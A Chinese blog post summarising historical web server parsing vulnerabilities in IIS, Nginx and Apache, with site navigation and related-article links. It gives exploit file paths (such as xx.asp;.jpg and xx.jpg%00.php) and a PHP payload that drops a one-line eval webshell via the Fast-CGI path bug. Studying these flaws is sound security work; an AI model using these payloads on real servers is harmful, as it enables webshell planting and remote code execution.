Web服务器解析漏洞总结

最新推荐文章于 2024-04-23 02:56:35 发布
最新推荐文章于 2024-04-23 02:56:35 发布
阅读量4.2k 收藏 1
点赞数
分类专栏: php hack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wusuopuBUPT/article/details/26230901
版权
php 同时被 2 个专栏收录
75 篇文章 0 订阅
订阅专栏
hack
23 篇文章 0 订阅
订阅专栏
Web服务器解析漏洞总结


0x01 IIS 5.x/6.0解析漏洞


利用方法有两种:
1.目录解析
/xx.asp/xx.jpg 
2.文件解析
/xx.asp;.jpg
IIS6.0不会把上面的文件当做jpg格式文件处理,而是当成了asp文件
wooyun上的IIS 6.0解析漏洞利用案例:
http://www.wooyun.org/searchbug.php?q=IIS6.0


0x02 IIS7.0/IIS7.5/Nginx<8.03 解析漏洞


这个漏洞是80sec研究出来的,见
1.http://www.80sec.com/nginx-securit.html
2.http://www.laruence.com/2010/05/20/1495.html


在默认Fast-CGI开启状况下,上传一个名字为xx.jpg,内容为 
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

的文件,然后访问xx.jpg/.php,在这个目录下就会生成一句话木马 shell.php


0x03 Nginx < 8.03空字节代码执行漏洞


Ngnix在图片中其纳入PHP代码然后通过访问:
xx.jpg%00.php
来执行其中的代码


Nginx 空字节代执行漏洞案例:
http://www.wooyun.org/searchbug.php?q=%2500.php


0x04 Apache解析漏洞


Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.


比如 xx.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把xx.php.owf.rar解析成xx.php


0x05 参考


http://drops.wooyun.org/papers/539




d4shman
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【文件上传漏洞-06】Web容器解析漏洞实战详解
cc
02-18 4204
文件上传漏洞第一个条件是文件成功上传且没能过滤掉恶意代码;第二个条件是让代码执行。对于第一个条件,存在着前端JS检测绕过、服务端MIME类型绕过、服务端后缀名绕过、文件内容绕过等,其根本目的是要上传文件。对于第二个条件,当中间件为IIS时:优先考虑绕过后缀名时采用恶意代码能够执行的后缀,这样文件能直接执行;当IIS版本为5.x或6.x时,考虑利用文件解析漏洞、目录解析漏洞执行该文件;当IIS版本为7.x时,考虑利用CGI-PHP解析漏洞来执行该文件。
Web安全-文件上传漏洞(常见上传解析漏洞,常见检测方式绕过)
m0_74220316的博客
07-04 2268
Webshell是一种利用Web服务器漏洞或弱点,通过远程上传恶意代码到服务器上(实质上是一种网页后门),并执行命令或控制服务器的一种攻击方式。在上传过后,该文件与网站服务器web目录下的正常网页文件混在一起,然后就可以通过该文件得到一个命令执行环境攻击者可以通过Webshell获取服务器的高权限,进而进行非法操作,例如修改服务器文件、数据库操作、执行系统命令等。Webshell具有隐蔽性高、操作方便等特点,常被用于非法攻击、入侵行为或用于进行系统安全评估和渗透测试。
Web中间件常见漏洞总结
qq_35358965的博客
05-09 2727
是一类提供系统软件和应用软件之间的连接,便于软件各部件之间的沟通的软件,应用软件可以借助中间件在不同的技术架构之间共享信息和资源。中间件位于客户机服务器的操作系统之上,管理着计算资源和网络通信。中间件=平台+通信。
解析漏洞利用及防御
最新发布
m0_59053674的博客
04-23 1866
解析漏洞的原理、检测、利用与防御
常见Web十大漏洞,常见Web漏洞
qq_22792465的博客
07-27 6322
参考:https://blog.csdn.net/weixin_43376075/article/details/105189017https://blog.csdn.net/qq_43168364/article/details/105595532https://www.cnblogs.com/-qing-/p/10819069.html代码执行函数:1- eval()#传入的参数必须为PHP代码,既需要以分号结尾。比如从指定URL地址获取网页文本内容,加载指 定地址的图片,下载等等。
jsp的文件上传漏洞详解
zkaqlaoniao的博客
11-06 931
在某次对某单位进行渗透测试时,遇到一个上传点,网站是java写的,但是上传jsp和jspx时会被waf拦截,但由于上传路径可控,经过不懈努力最终成果拿到shell,于是写这篇文章记录一下。目录中可以用来放置JSP的静态资源,在servlet3.0协议规范中,包含在jar文件 /META-INFO/resources/ 路径下的资源是可以直接访问的。,代表tomcat默认开启热部署,一旦web应用的web.xml文件的时间戳发生变化(创建时间,修改时间或访问时间发生变化),tomcat就会重新加载应用。
Web应用安全:IIS解析漏洞.pptx
06-19
IIS是一种Web(网页)服务组件,其中包括Web服务器、FTP服务器、NNTP服务器和SMTP服务器,分别用于网页浏览、文件传输、新闻服务和邮件发送等方面,它使得在网络(包括互联网和局域网)上发布信息成了一件很容易的事...
Web中间件常见漏洞总结(免积分)
02-09
通过严格控制可访问的路径和文件,限制目录遍览,以及配置IIS或Apache等Web服务器的安全选项,可以防止这类攻击。 五、弱口令与默认配置 许多Web中间件存在默认密码或不安全的配置,攻击者可能轻易利用这些弱点。...
web安全漏洞解析
10-11
随着Web2.0、社交网络...黑客利用网站操作系统的漏洞Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。
Web服务器识别技术揭秘
09-30
以下是对Web服务器识别技术的详细解析: 1. **通过HTTP报头识别** 当客户端(如浏览器)向Web服务器发送请求时,服务器会返回HTTP响应报头,其中包含了服务器类型和版本等信息。例如,`Server`字段会显示服务器...
Web渗透测试-常见漏洞解析课件
03-23
本课件“Web渗透测试-常见漏洞解析”旨在深入探讨这一主题,帮助学习者理解和掌握如何有效地进行Web应用安全评估。 首先,我们要了解渗透测试的基本流程。它通常包括信息收集、漏洞扫描、漏洞利用、权限提升和清理...
JSP安全开发之XSS漏洞详解
10-21
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。
WEB十大安全漏洞(OWASP Top 10)与渗透测试记录
qq_33163046的博客
04-27 8026
WEB安全的主要类型每年都要较小的变化。熟练掌握最常见的WEB漏洞类型是渗透工作的展开的重要基础。
常见Web安全漏洞深入解析
大河之犬的博客
10-19 4225
在存在可跨站脚本攻击安全漏洞Web应用上执行上面这段JavaScript程序,即可访问到该Web应用所处域名下的Cookie信息。Web应用中的邮件发送功能,攻击者通过向邮件首部To或Subject内任意添加非法内容发起的攻击。并排插入字符串后发送。利用这两个连续的换行就可作出HTTP首部与主体分隔所需的空行了,这样就能显示伪造的主体,达到攻击目的。远程文件包含漏洞是指当部分脚本内容需要从其他文件读入时,攻击者利用指定外部服务器的URL充当依赖文件,让脚本读取之后,就可运行任意脚本的一种攻击。
jsp相关漏洞
qq_44790964的博客
11-25 2117
注入 xss 上传 编辑器 st2漏洞 反序列漏洞 网站容器 弱口令漏洞 Struts漏洞 是Apache基金会jakarta项目组的一个开源项目 .action 可能会存在st2漏洞 漏洞挖掘 单个目标站进行测试 工具爬行 找打存在漏洞地址例如 xx.action (一般存在登录的地方 注册 留言的地方) 可能会存在 用相关工具进行测试即可 批量查找与利用(.do 是jsp的页面) 登录或...
服务器解析漏洞详解
monkey-jie的博客
12-11 1215
本文转载至:https://thief.one/2016/09/21/服务器解析漏洞/ 作者:nMask 服务器解析漏洞算是历史比较悠久了,但如今依然广泛存在。在此记录汇总一些常见服务器解析漏洞,比如IIS6.0、IIS7.5、apache、nginx等方便以后回顾温习。 (一)IIS5.x-6.x解析漏洞 使用iis5.x-6.x版本的服务器,大多为windows server 2003,网站...
最近WEB安全扫描问题汇总
热门推荐
ivan0609的专栏
06-15 1万+
严重问题: 1、Tomcat版本过低 Tomcat5~8各个版本尽量使用最新的版本,新版已经修复了已经发现的漏洞。 2、SQL盲注 对于用户输入的参数进行过滤。 3、jQuery跨站脚本 升级jQuery,更换为最新版的jQuery
WEB和主机漏洞处理总结
工作随笔
03-09 4421
近日随着项目越来越高的等保要求,对代码安全和系统本身安全要求越来越高,以下就近日项目上遇到的由第三方公司扫描出来的漏洞处理办法进行一个总结。 1.IIS短文件和文件夹泄漏漏洞 处理办法(一): 禁用windows系统中的短文件名功能。 打开注册表并打开此目录 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem ...
经典Web容器解析漏洞
good good study
03-07 5166
目录 Apache 文件名解析漏洞(5.2.x以下)(info.php.x 绕过) IIS6.0解析漏洞 文件名解析漏洞(time.asp;1.jpg) 目录解析漏洞(1.asp/time.jpg) PHP-CGI 解析漏洞(IIS 7.0(info.png/.php)) Nginx解析漏洞 1. 空字节漏洞(nginx/0.7.65)(/info.png%00.php) 2. 文件名逻辑漏洞-CVE-2013-4547(1.4.2)(info.png[0x20][0x00].php) .
2022年优秀-LinuxWEB服务器安全.pptx
11-14
2022年优秀-LinuxWEB服务器安全.pptx中提到了WEB服务器安全的隐患主要包括WEB应用程序的漏洞WEB服务器软件本身的漏洞WEB服务依赖的NOS漏洞以及NOS配置及管理的疏忽。WEB应用程序的漏洞通常是由WEB程序员在编写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值